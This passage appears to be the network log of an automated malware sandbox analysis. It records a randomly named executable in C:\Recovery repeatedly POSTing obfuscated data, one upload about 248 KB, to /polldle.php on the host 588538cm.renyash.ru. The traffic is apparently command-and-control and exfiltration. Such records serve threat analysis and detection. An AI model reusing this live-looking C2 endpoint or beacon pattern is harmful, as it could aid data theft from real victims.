                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                19192.168.2.449823104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:12.005724907 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:12.379863024 CET2504OUTData Raw: 58 59 54 56 5f 45 5f 58 54 5d 55 5a 50 5a 59 58 50 5d 5a 52 57 51 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XYTV_E_XT]UZPZYXP]ZRWQPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#92C%(($"$* Z9_/(/W1%-$6"X(5#X'/\/<
                                                                                Jan 11, 2025 23:33:12.447149992 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:12.750646114 CET804INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:12 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MRy8MXXX%2F5VCzd17uGFOQJq%2FnTT5tAgPshuew5NukJvBnNGwGzcGSydDP3v9LcZvzJbGjJ7Lu%2BZjhiAUE7BsOf3wVgLSBl7LKdvbVqyJ3lNKgg6lLf5VV8rf9HmQe1TZ4w00VyQT"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085dfc89db0f88-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4347&min_rtt=1668&rtt_var=5983&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=63200&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0
                                                                                Jan 11, 2025 23:33:13.095062017 CET804INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:12 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MRy8MXXX%2F5VCzd17uGFOQJq%2FnTT5tAgPshuew5NukJvBnNGwGzcGSydDP3v9LcZvzJbGjJ7Lu%2BZjhiAUE7BsOf3wVgLSBl7LKdvbVqyJ3lNKgg6lLf5VV8rf9HmQe1TZ4w00VyQT"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085dfc89db0f88-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4347&min_rtt=1668&rtt_var=5983&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=63200&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                20192.168.2.449830104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:13.095876932 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:13.444513083 CET2504OUTData Raw: 5d 5e 54 51 5a 40 5f 5b 54 5d 55 5a 50 5f 59 5d 50 55 5a 53 57 54 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]^TQZ@_[T]UZP_Y]PUZSWTPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#-0%1$]&!5'-R 6/;?+<7&&R-4(_63(%#X'/\/(
                                                                                Jan 11, 2025 23:33:13.548526049 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:13.762217045 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:13.785037041 CET810INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:13 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FWzhSQ%2B72o8Un0gjNoxjMNF%2BolC3Kp4kfIvERTJ9WaqIKwMGLnyXS%2BFrMqAqaTEYy5ns%2F5S3LpiR%2FrsKz02%2FKwiY5iSxV1L3SGw5Uin0O3v7tbjYaPP9Ej1wd9mJkN4jnVPKpzGG"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e036ba632f4-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3882&min_rtt=1913&rtt_var=4657&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=82616&cwnd=111&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                21192.168.2.449836104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:13.962224007 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                22192.168.2.449837104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:14.246073008 CET321OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 247860
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:14.598679066 CET12360OUTData Raw: 58 59 51 52 5f 45 5a 5d 54 5d 55 5a 50 5f 59 51 50 50 5a 5e 57 56 50 58 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XYQR_EZ]T]UZP_YQPPZ^WVPX[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU :)2;&6$U7%Z;]7Y+?#%0)."'\+#X'/\/(
                                                                                Jan 11, 2025 23:33:14.603634119 CET2472OUTData Raw: 11 3b 26 2e 0e 02 35 26 3c 55 03 52 36 41 52 21 35 54 2c 1c 39 04 1f 13 3e 2a 59 0f 38 55 06 16 26 59 43 29 0f 1e 23 5f 3c 1c 2b 30 09 14 2b 30 04 0b 2d 1f 29 56 19 32 33 2f 30 0b 3e 23 0b 1a 24 5c 02 3b 07 59 09 02 0e 2e 20 38 2d 0a 1b 04 0b 3d
                                                                                Data Ascii: ;&.5&<UR6AR!5T,9>*Y8U&YC)#_<+0+0-)V23/0>#$\;Y. 8-='18;Z<!896?ZU^#[T(1071:D=?3H^%>3 X,98<X?S&#S7"!,(0Z6+5>ZY3+#&">>659"T>'$])(.^#56;+] 7%?]%2PU;:<;;Y
                                                                                Jan 11, 2025 23:33:14.603697062 CET2472OUTData Raw: 2a 5c 5c 09 3e 20 0b 0b 31 58 04 17 30 1d 37 3c 0a 2d 52 3e 33 26 2b 1f 2c 5d 0a 1a 2d 06 06 2d 39 0e 05 5f 07 56 07 23 20 29 27 3e 09 22 01 2f 3c 38 3a 1a 32 38 24 22 0e 3d 04 14 0d 22 0e 35 26 31 26 5c 24 2f 0d 36 0c 2f 58 1b 2b 23 31 05 3d 23
                                                                                Data Ascii: *\\> 1X07<-R>3&+,]--9_V# )'>"/<8:28$"="5&1&\$/6/X+#1=#B2(/U%*X? 91)*))'>^'" 9=8Z<< 90@3:=:)U;T0/0.%8\<:%14YV9@0Y7Z6'YW,;1##'=0<>9*<)6.$2?-).&TE$?Z-,74^,4$/&R6,9
                                                                                Jan 11, 2025 23:33:14.603725910 CET2472OUTData Raw: 3f 2c 0a 08 32 1b 50 2d 25 5a 28 20 0e 13 20 51 25 29 31 2d 07 2d 08 22 33 5f 00 2c 39 3e 0f 0b 20 58 20 19 37 09 31 41 0e 28 3f 26 26 32 36 04 24 5b 04 53 09 2d 41 38 31 02 3f 5a 02 06 02 13 0a 2f 31 1d 2d 0a 23 04 22 57 24 2a 34 0d 5f 02 01 39
                                                                                Data Ascii: ?,2P-%Z( Q%)1--"3_,9> X 71A(?&&26$[S-A81?Z/1-#"W$*4_9<<8^38-@6#1T'ZSS0&?2)#X:+:2QY-7>0+?]"+):5>>33)&##ZT+10=P*8<%=9ZS0>V+W$]?/=.;"Y_"1 T27?<;&4U+,0?4S=[#,
                                                                                Jan 11, 2025 23:33:14.603837013 CET4944OUTData Raw: 32 0b 59 44 05 28 0e 0a 24 3a 0c 15 39 5b 35 11 32 3e 08 0b 3e 26 35 1d 2c 0f 06 04 20 5a 2d 11 08 39 32 17 36 56 30 5d 37 58 23 58 31 21 20 00 2d 0a 0d 1d 32 5f 05 02 31 2f 2d 28 28 55 27 21 3d 10 5f 11 0c 11 21 3d 3a 17 2c 18 05 3e 23 5e 24 20
                                                                                Data Ascii: 2YD($:9[52>>&5, Z-926V0]7X#X1! -2_1/-((U'!=_!=:,>#^$ :7!4Y(@3'[8[#Q>5'2XQ?(9\4X$S99U5*&)#013:=<A088-$#:?%+,777: Z7!+_/7?X7_?E&0%D=% 403.8'0(-0^[)98!$^&8V 1#<Z:^
                                                                                Jan 11, 2025 23:33:14.603949070 CET2472OUTData Raw: 0b 2e 38 1e 01 30 5f 06 0b 3d 28 3b 3f 1c 37 54 13 3c 16 1f 22 31 2c 57 3f 5d 5e 3b 34 04 2e 35 33 03 22 33 0b 07 26 53 26 3d 0e 25 34 32 39 41 31 5d 0d 05 26 31 13 1e 3f 3c 29 11 21 58 41 02 35 01 3f 1c 28 2e 3c 16 27 56 25 51 2e 42 19 5a 3f 55
                                                                                Data Ascii: .80_=(;?7T<"1,W?]^;4.53"3&S&=%429A1]&1?<)!XA5?(.<'V%Q.BZ?U<11<W<-;2(+;?W"%-:%X+6:[-(0[9U38=2%#9;9\?^]7&,2/&X3T!&;W2[2UR2315!!9Z'Y9Q."86C01%V$("T&P7 U\\8++6#<>
                                                                                Jan 11, 2025 23:33:14.603979111 CET3708OUTData Raw: 26 02 0a 5d 07 0c 0f 22 09 32 3f 1d 05 36 20 50 15 3a 0c 36 08 2f 21 28 01 57 1c 24 35 42 36 18 05 0b 0e 58 27 5a 36 54 08 04 51 54 38 0f 2f 1e 0c 2c 47 1d 26 30 28 1b 37 27 23 13 26 2b 15 30 31 0c 07 22 00 22 0d 13 30 31 2c 31 0d 01 35 1b 3c 5f
                                                                                Data Ascii: &]"2?6 P:6/!(W$5B6X'Z6TQT8/,G&0(7'#&+01""01,15<_W3 <1.V8'(4 V1#'7$(^-T_!Z7Y!?,29$%E?:,218)<.)#2) 587+>?>%3(8+.3\3E:$2=Z0]_</S3%;__:9^ P8T)X:;/R2&4S>=1
                                                                                Jan 11, 2025 23:33:14.604008913 CET1236OUTData Raw: 0c 2c 3e 56 20 07 2c 42 2d 31 2d 07 3d 5e 3f 30 31 21 45 34 0f 3c 54 56 08 2d 1c 5a 35 04 24 2e 07 07 3c 33 27 1d 25 33 01 1e 33 22 3b 0c 24 2d 04 31 12 5a 37 5c 06 38 05 2c 02 2c 2b 2b 33 35 31 33 3a 43 3e 02 25 24 31 23 33 38 3e 20 0b 37 3f 40
                                                                                Data Ascii: ,>V ,B-1-=^?01!E4<TV-Z5$.<3'%33";$-1Z7\8,,++3513:C>%$1#38> 7?@*'_4)0V'(26Z_!_@&&'0#92)&X*T"5%X3?*%['+33.?F>].!Z:Q)9!9,;1YT$U!=7=\=3^14%_([1"4%Y<*?/6_ ]0Q<-)!;"ZF%-8.B/&,86-+
                                                                                Jan 11, 2025 23:33:14.604031086 CET2472OUTData Raw: 26 3a 28 11 02 3c 09 02 08 56 53 3f 31 54 07 06 09 5a 56 5c 29 43 0a 51 11 04 02 3d 0e 00 19 57 3d 27 31 1f 30 2c 32 36 3f 5d 3a 1f 0d 10 31 50 11 13 24 20 3a 54 22 08 09 07 20 5d 3a 0b 3e 16 3c 06 36 08 22 20 3e 19 3b 01 01 5a 02 06 2f 15 31 54
                                                                                Data Ascii: &:(<VS?1TZV\)CQ=W='10,26?]:1P$ :T" ]:><6" >;Z/1T1444;$]^(0(+_%2Q) .6?:Y:A-^4 81+#5>.9U#?61];X51%Y< -Z<[3>;31=>#6,>Q8!8<&'3A&>=<R58.:U\4=2'/+
                                                                                Jan 11, 2025 23:33:14.604059935 CET2472OUTData Raw: 38 55 21 00 11 11 27 27 0a 5a 3b 3c 03 33 29 5c 3c 1c 27 3f 31 24 3c 05 2a 39 18 3d 3b 2e 2d 23 00 08 0f 50 31 35 0c 5b 35 0b 28 01 31 2d 2a 11 0e 03 0f 12 38 56 27 21 37 31 27 5c 3e 09 20 5e 30 38 23 2d 39 3a 3f 0b 30 23 25 1b 28 56 23 08 3b 2d
                                                                                Data Ascii: 8U!''Z;<3)\<'?1$<*9=;.-#P15[5(1-*8V'!71'\> ^08#-9:?0#%(V#;-$?;$?4)+ Y!2092?[7:%*"$*[)0+<;?793X"1:$X&>*/.,817$3?08?>V[^)V8?+'<#0<2?W#)/*]#?82U>2 =642%4;;=\
                                                                                Jan 11, 2025 23:33:14.713777065 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:15.772346973 CET808INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:15 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PZ9mnMIbfT6RqFcMdtsQOuh%2BQK6Zdw2JCAjEzg4nXU0WGBzr6oOubkdPrM75W%2FQoAj6Kk14Hm3IBL2cCoYd2laMyLY82fpQucdbEZ6YaJ6nJFFAPDcltvitCWOW2HdoPrcFNGpR1"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e0aadf35e7c-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2210&min_rtt=1692&rtt_var=1670&sent=87&recv=258&lost=0&retrans=0&sent_bytes=25&recv_bytes=248181&delivery_rate=250171&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0
                                                                                Jan 11, 2025 23:33:15.772790909 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1620
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:15.871711016 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:16.154567957 CET966INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:16 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pu5R2ka98Qj0QiwfmxdBlzvDs2pY8piaxvMwfC9sJa8XU%2Bq5qIsbHUexjVVZJLUXFB2jv3%2B4YJzksLbsRidX9p%2BKEppW9qm%2BwAEn4R8jUsy74ZbhC%2FuUgYYlB4WVAmF6Zm6SbA3V"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e11ef065e7c-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7011&min_rtt=1610&rtt_var=10782&sent=93&recv=264&lost=0&retrans=0&sent_bytes=858&recv_bytes=250096&delivery_rate=1755862&cwnd=198&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2d 0a 24 0a 2f 00 28 3a 23 5e 39 28 2f 1f 2c 21 0e 12 2a 0f 08 5b 20 39 15 04 32 0b 3b 0a 3f 39 3e 19 2a 3a 05 1c 34 58 22 52 26 39 23 46 0c 1d 21 01 3e 59 27 0b 31 02 0a 1f 28 0d 3d 03 32 0c 05 1b 28 37 28 08 3d 2a 00 05 22 5a 22 52 2a 21 39 53 3d 36 3e 5d 2c 1f 2b 59 31 2a 2e 51 0f 16 21 1d 35 1f 23 01 37 2d 1e 01 26 30 33 11 3c 37 2c 13 31 03 38 53 3f 0d 22 12 3c 1c 2c 54 30 13 0d 1d 31 06 3a 5a 3e 3a 37 1b 3f 3b 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98-$/(:#^9(/,!*[ 92;?9>*:4X"R&9#F!>Y'1(=2(7(=*"Z"R*!9S=6>],+Y1*.Q!5#7-&03<7,18S?"<,T01:Z>:7?;$\#(V?[M0
                                                                                Jan 11, 2025 23:33:16.498668909 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:16.597563982 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:16.890289068 CET814INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:16 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n%2B5P0OBdix3yydRX37sq4UdWgBkuE1VINmeZiuJe66pRZFxtT1ux7ZhqX4DjE%2BXJuyf5bjFQDsp3jpiRdtesykoGTNMmLpqPz0qyE5ttkZKJmeE9YqSqwpGNwJ1xnQgMZ%2B5zQN2Q"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e167c6f5e7c-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7860&min_rtt=1610&rtt_var=10096&sent=99&recv=269&lost=0&retrans=0&sent_bytes=1849&recv_bytes=252895&delivery_rate=1755862&cwnd=201&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                23192.168.2.449838104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:14.434283018 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:14.786067963 CET2504OUTData Raw: 58 58 51 50 5a 45 5f 58 54 5d 55 5a 50 5f 59 5e 50 5d 5a 59 57 52 50 57 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XXQPZE_XT]UZP_Y^P]ZYWRPW[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#-#%%,Y&=0<&"<=;#<<,&3T:([";Z+%#X'/\/(
                                                                                Jan 11, 2025 23:33:14.908651114 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:15.151957989 CET810INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:15 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8L8G4Xx2zaL%2BS8I02RVl2MDgz0NdQMWtaNXhn1%2BH9K9CwQGUn0eloQM4fV94F%2FY4FOAE2nOOFDcJ8MTPVeKCMZNx1VCCeMT126ROHrw%2FqPzG%2B2eD6UuSTYueVsRaEO%2BgFFwOHXrr"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e0bee684390-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3898&min_rtt=1758&rtt_var=4940&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=77326&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                24192.168.2.449844104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:15.280251980 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:15.629965067 CET2504OUTData Raw: 5d 5c 51 55 5a 44 5a 5e 54 5d 55 5a 50 55 59 5b 50 56 5a 53 57 56 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]\QUZDZ^T]UZPUY[PVZSWVPV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#-3.@2$]%!5]3?1V",:,'_(,3U&#&V9$ "T;+%#X'/\/
                                                                                Jan 11, 2025 23:33:15.721472025 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:15.994685888 CET806INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:15 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=91GriX%2B7SZUb2T%2F5K%2BURD59jDxKwVDgGUPf5tNjlcUhNUqHA5PjtmZ%2BxVpSBsCSf34knH69rucea9SUsxchRIqI1IqHWbP6QMUgvq1EpaSckcMKWywp89z9TABBtImarxLzjoBgE"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e110a2a422d-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1791&min_rtt=1618&rtt_var=953&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=485856&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                25192.168.2.449854104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:17.024131060 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
